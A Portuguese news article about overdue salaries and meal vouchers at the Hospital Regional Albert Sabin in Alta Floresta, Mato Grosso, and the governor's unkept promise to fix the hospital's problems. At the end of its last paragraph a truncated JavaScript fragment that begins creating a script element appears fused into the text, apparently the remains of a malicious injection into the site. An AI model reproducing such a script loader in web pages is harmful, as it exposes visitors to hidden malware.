Capa / Em Destaque / Taques não cumpre prometido e verbas salariais do HRAS não foram pagas

Taques não cumpre prometido e verbas salariais do HRAS não foram pagas

HospitalA “velha novela” em torno dos atrasos salariais dos funcionários do hospital Regional Albert Sabin de Alta Floresta ainda não terminou. O ano começou complicado para os funcionários que estão novamente com os salários atrasados. Segundo informações obtidas por nossa equipe, os salários referentes ao mês de dezembro, com vencimento no 5º dia útil de janeiro (dia 08) ainda não foram quitados. Hoje já somam 06 dias de atraso salarial, aparentemente sem nenhuma previsão de quitação.
Outra verba que atravessou 2015 gerando polêmica é referente aos tickets de alimentação que já acumulam atrasos de até 8 meses. A fonte que nos repassou os dados relativos aos atrasos, afirma que a direção da unidade hospitalar não repassa nenhuma informação a respeito dos atrasos.
O Hospital Regional Albert Sabin de Alta Floresta atende seis municípios da região norte de Mato Grosso e ainda pacientes oriundo do Pará. No ano de 2015 ao menos duas greves paralisaram as atividades do hospital, tendo como principal motivo os salários em atrasos, a situação chegou a tal patamar que chegou a faltar até gás de cozinha e gás oxigênio, dando início a rumores de um possível fechamento da unidade de saúde.
A situação do hospital apresentou uma leve melhora após um grupo de prefeitos e vereadores da região irem até a Capital Cuiabá para dialogar com o governador Pedro Taques, buscando uma melhora da saúde no município. O governador desembarcou no dia 23 de novembro para uma agenda oficial em Alta Floresta, onde visitou o hospital e garantiu, naquela oportunidade, que todos os problemas estariam resolvidos até o final de 2015.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top